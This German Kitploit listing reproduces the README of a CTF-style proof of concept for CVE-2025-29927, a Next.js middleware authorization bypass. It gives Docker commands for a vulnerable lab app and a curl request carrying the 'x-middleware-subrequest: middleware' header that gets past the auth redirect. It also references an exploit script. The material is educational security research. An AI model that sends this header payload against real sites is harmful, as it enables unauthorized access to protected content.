Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2025-29927 — CTF-artiger Proof-of-Concept, der die Umgehung der Next.js-Middleware-Autorisierung gemäß CVE-2025-29927 demonstriert. Enthält eine angreifbare Docker-App und ein Exploit-Skript, um die Flagge von einer geschützten Route abzurufen. | Kitploit
Tools/GitHubGitHub/mhamzakhattak/cve-2025-29927
SchwachstellenanalyseExploitationWebanwendungs-ExploitationCTFPenetrationstestsLernen & Bildung
GitHubmhamzakhattak/cve-2025-29927

CVE-2025-29927

CTF-artiger Proof-of-Concept, der die Umgehung der Next.js-Middleware-Autorisierung gemäß CVE-2025-29927 demonstriert. Enthält eine angreifbare Docker-App und ein Exploit-Skript, um die Flagge von einer geschützten Route abzurufen.

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen
Repository anzeigen
1vor 1 JahrNoch nicht geprüft

CVE-2025-29927 – Next.js Middleware Autorisierungsumgehung (PoC)

Dies ist ein Capture The Flag (CTF)-artiger Proof of Concept für die Next.js Middleware Autorisierungsumgehung-Schwachstelle (CVE-2025-29927). Das Ziel ist es, die Auth-Middleware zu umgehen und die Flagge von der /protected-Route abzurufen.


Zusammenfassung der Schwachstelle

  • CVE: CVE-2025-29927
  • Typ: Autorisierungsumgehung
  • Komponente: Next.js Middleware
  • Auswirkung: Unautorisierter Zugriff auf geschützte Routen
  • PoC-Zielroute: /protected
  • Erwartetes Verhalten: Nicht autorisierte Benutzer werden zu / umgeleitet
  • Anfälliges Verhalten: Durch eine manipulierte Anfrage kann die Umleitung umgangen und der geschützte Inhalt direkt aufgerufen werden

PoC-Einrichtung

1. Repository klonen

root@kitploit:~
git clone https://github.com/mhamzakhattak/CVE-2025-29927
cd CVE-2025-29927
cd nextjs-docker

2. Die angreifbare App bauen und ausführen

root@kitploit:~
sudo docker build -t nextjs-auth-app .
sudo docker run -p 3000:3000 nextjs-auth-app

Dadurch wird die angreifbare Next.js-App unter http://IP:3000 gestartet.


Ausnutzung

1. Ohne Exploit

Versuche folgenden Aufruf:

root@kitploit:~
curl -i http://IP:3000/protected

Du wirst zu / umgeleitet.

root@kitploit:~
 curl -H "x-middleware-subrequest: middleware" http://IP:3000/protected

2. Mit Exploit

Verwende das bereitgestellte exploit.py, um die Middleware zu umgehen und auf die geschützte Route zuzugreifen:

root@kitploit:~
python3 exploit.py -url http://IP:3000

Bei Erfolg erhältst du die Flagge von /protected.


Dateien

  • Dockerfile – Erstellt die angreifbare Next.js-Anwendung
  • exploit.py – Nutzt die Schwachstelle aus, um die Authentifizierung zu umgehen
  • pages/ – Enthält die angreifbaren Routen /protected und /login
  • middleware.js – Die angreifbare Middleware-Logik
  • README.md – Diese Datei

Haftungsausschluss

Dieser PoC dient nur zu Bildungs- und Forschungszwecken. Verwende ihn nicht gegen Systeme, die dir nicht gehören oder für die du keine ausdrückliche Erlaubnis zum Testen hast.


🏁 Flagge

Finde die Flagge, indem du die Schwachstelle ausnutzt und auf folgende Route zugreifst:

root@kitploit:~
http://IP:3000/protected

Viel Glück! 🏴‍☠️

Tool herunterladen